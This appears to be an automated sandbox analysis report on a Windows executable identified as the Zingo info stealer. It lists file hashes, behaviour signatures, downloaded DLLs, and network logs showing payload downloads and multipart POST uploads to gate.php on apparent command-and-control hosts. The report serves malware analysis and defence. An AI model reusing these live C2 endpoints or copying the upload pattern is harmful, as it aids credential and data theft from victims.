Analysis

  • max time kernel
    90s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-10-2022 15:09

General

  • Target

    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe

  • Size

    54KB

  • MD5

    b5282d498ca119c35cdbae2d0783dbfd

  • SHA1

    d2acb7d1c31e3035386194c09a56f7e22de162d6

  • SHA256

    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5

  • SHA512

    7ac7758bc08b0f2075a79196ab85df976fa36ed380b0b8f81739005d92a58a91e55ba845337ab08dcf78d05c31735dbb3835549a6c7416e9a523864ab594add3

  • SSDEEP

    768:VzoZgTk0MRUQDbDySGol+1R/8LGRaUh1GM78EEcOwPsiX/z+h:JoZgTPsbDySGol+ELC1NAfG/g

Malware Config

Signatures

  • Zingo stealer

    Zingo is an info stealer first seen in March 2022.

  • Zingo stealer payload 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    "C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    PID:3720

Network

  • flag-us
    DNS
    n21krwhz.beget.tech
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    n21krwhz.beget.tech
    IN A
    Response
    n21krwhz.beget.tech
    IN A
    87.236.19.248
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/DotNetZip.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/DotNetZip.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:09 GMT
    Content-Type: application/x-msdownload
    Content-Length: 472064
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "73400-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/System.Data.SQLite.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/System.Data.SQLite.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:10 GMT
    Content-Type: application/x-msdownload
    Content-Length: 393520
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "60130-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/Newtonsoft.Json.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:10 GMT
    Content-Type: application/x-msdownload
    Content-Length: 701992
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "ab628-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL/BouncyCastle.Crypto.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:11 GMT
    Content-Type: application/x-msdownload
    Content-Length: 2609152
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "27d000-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL//x86/SQLite.Interop.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:13 GMT
    Content-Type: application/x-msdownload
    Content-Length: 1374512
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "14f930-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    GET
    http://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dll
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    GET /DLL//x64/SQLite.Interop.dll HTTP/1.1
    Host: n21krwhz.beget.tech
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:14 GMT
    Content-Type: application/x-msdownload
    Content-Length: 1763632
    Connection: keep-alive
    Keep-Alive: timeout=30
    Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
    ETag: "1ae930-5e9d1da08cdc0"
    Accept-Ranges: bytes
  • flag-ru
    POST
    http://n21krwhz.beget.tech/gate.php
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    87.236.19.248:80
    Request
    POST /gate.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------8daaf88ae3b3765
    Host: n21krwhz.beget.tech
    Content-Length: 1505678
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Server: nginx-reuseport/1.21.1
    Date: Sun, 16 Oct 2022 15:11:23 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Keep-Alive: timeout=30
    X-Powered-By: PHP/7.4.25
  • flag-us
    DNS
    freegeoip.app
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    freegeoip.app
    IN A
    Response
    freegeoip.app
    IN A
    188.114.96.0
    freegeoip.app
    IN A
    188.114.97.0
  • flag-us
    GET
    https://freegeoip.app/xml/
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    188.114.96.0:443
    Request
    GET /xml/ HTTP/1.1
    Host: freegeoip.app
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 16 Oct 2022 15:11:17 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 16 Oct 2022 16:11:17 GMT
    Location: https://ipbase.com/xml/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PwNJ8V%2BoM1jKjs66Y%2Bj8VrYMlkTQPd67WgKcM6ueaVU12bgus6oJ6Q8U3cY0IfpW8c3O%2FJ7ZiXHgvr9WAZmHsj8c73nm3gL2t4EXcOuT4Jj9lsNQR9u61La%2BqQq5Mq40"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 75b1b9e4bc981e85-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    DNS
    ipbase.com
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    ipbase.com
    IN A
    Response
    ipbase.com
    IN A
    75.2.60.5
    ipbase.com
    IN A
    99.83.231.61
  • flag-us
    GET
    https://ipbase.com/xml/
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    75.2.60.5:443
    Request
    GET /xml/ HTTP/1.1
    Host: ipbase.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Age: 90147
    Cache-Control: public, max-age=0, must-revalidate
    Content-Length: 3082
    Content-Type: text/html; charset=utf-8
    Date: Sat, 15 Oct 2022 14:08:50 GMT
    Etag: 1649775430-ssl
    Server: Netlify
    Strict-Transport-Security: max-age=31536000
    X-Nf-Request-Id: 01GFGNJTTEB1VFDBZK9ZXBFD43
  • flag-us
    DNS
    f0671130.xsph.ru
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    8.8.8.8:53
    Request
    f0671130.xsph.ru
    IN A
    Response
    f0671130.xsph.ru
    IN A
    141.8.197.42
  • flag-ru
    POST
    http://f0671130.xsph.ru/gate.php
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    Remote address:
    141.8.197.42:80
    Request
    POST /gate.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------8daaf88af9e7278
    Host: f0671130.xsph.ru
    Content-Length: 1505678
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Sun, 16 Oct 2022 15:11:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • 87.236.19.248:80
    http://n21krwhz.beget.tech/gate.php
    http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    1.7MB
    7.6MB
    4016
    6289

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/DotNetZip.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/System.Data.SQLite.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dll

    HTTP Response

    200

    HTTP Request

    GET http://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dll

    HTTP Response

    200

    HTTP Request

    POST http://n21krwhz.beget.tech/gate.php

    HTTP Response

    200
  • 188.114.96.0:443
    https://freegeoip.app/xml/
    tls, http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    766 B
    3.8kB
    9
    8

    HTTP Request

    GET https://freegeoip.app/xml/

    HTTP Response

    301
  • 75.2.60.5:443
    https://ipbase.com/xml/
    tls, http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    806 B
    8.2kB
    10
    12

    HTTP Request

    GET https://ipbase.com/xml/

    HTTP Response

    404
  • 141.8.197.42:80
    http://f0671130.xsph.ru/gate.php
    http
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    1.5MB
    16.1kB
    1085
    394

    HTTP Request

    POST http://f0671130.xsph.ru/gate.php

    HTTP Response

    400
  • 13.89.179.9:443
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 8.8.8.8:53
    n21krwhz.beget.tech
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    65 B
    81 B
    1
    1

    DNS Request

    n21krwhz.beget.tech

    DNS Response

    87.236.19.248

  • 8.8.8.8:53
    freegeoip.app
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    59 B
    91 B
    1
    1

    DNS Request

    freegeoip.app

    DNS Response

    188.114.96.0
    188.114.97.0

  • 8.8.8.8:53
    ipbase.com
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    56 B
    88 B
    1
    1

    DNS Request

    ipbase.com

    DNS Response

    75.2.60.5
    99.83.231.61

  • 8.8.8.8:53
    f0671130.xsph.ru
    dns
    9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
    62 B
    78 B
    1
    1

    DNS Request

    f0671130.xsph.ru

    DNS Response

    141.8.197.42

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

    Filesize

    461KB

    MD5

    a999d7f3807564cc816c16f862a60bbe

    SHA1

    1ee724daaf70c6b0083bf589674b6f6d8427544f

    SHA256

    8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

    SHA512

    6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

  • C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

    Filesize

    461KB

    MD5

    a999d7f3807564cc816c16f862a60bbe

    SHA1

    1ee724daaf70c6b0083bf589674b6f6d8427544f

    SHA256

    8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

    SHA512

    6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

  • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

    Filesize

    685KB

    MD5

    081d9558bbb7adce142da153b2d5577a

    SHA1

    7d0ad03fbda1c24f883116b940717e596073ae96

    SHA256

    b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

    SHA512

    2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

  • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

    Filesize

    685KB

    MD5

    081d9558bbb7adce142da153b2d5577a

    SHA1

    7d0ad03fbda1c24f883116b940717e596073ae96

    SHA256

    b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

    SHA512

    2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

  • C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

    Filesize

    384KB

    MD5

    55c797383dbbbfe93c0fe3215b99b8ec

    SHA1

    1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

    SHA256

    5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

    SHA512

    648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

  • C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

    Filesize

    384KB

    MD5

    55c797383dbbbfe93c0fe3215b99b8ec

    SHA1

    1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

    SHA256

    5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

    SHA512

    648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

  • C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll

    Filesize

    1.3MB

    MD5

    8be215abf1f36aa3d23555a671e7e3be

    SHA1

    547d59580b7843f90aaca238012a8a0c886330e6

    SHA256

    83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

    SHA512

    38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

  • memory/3720-138-0x0000000005B30000-0x0000000005B80000-memory.dmp

    Filesize

    320KB

  • memory/3720-139-0x00000000057F0000-0x0000000005812000-memory.dmp

    Filesize

    136KB

  • memory/3720-132-0x0000000000370000-0x0000000000384000-memory.dmp

    Filesize

    80KB

  • memory/3720-137-0x0000000006CB0000-0x0000000006D60000-memory.dmp

    Filesize

    704KB

  • memory/3720-142-0x0000000006D60000-0x0000000006DC2000-memory.dmp

    Filesize

    392KB

  • memory/3720-143-0x0000000007300000-0x00000000074C2000-memory.dmp

    Filesize

    1.8MB

  • memory/3720-145-0x00000000077A0000-0x00000000077DC000-memory.dmp

    Filesize

    240KB

  • memory/3720-146-0x00000000085B0000-0x0000000008616000-memory.dmp

    Filesize

    408KB

  • memory/3720-134-0x0000000005BA0000-0x0000000006144000-memory.dmp

    Filesize

    5.6MB

  • memory/3720-133-0x0000000005550000-0x00000000055E2000-memory.dmp

    Filesize

    584KB

  • memory/3720-149-0x0000000008620000-0x000000000869A000-memory.dmp

    Filesize

    488KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.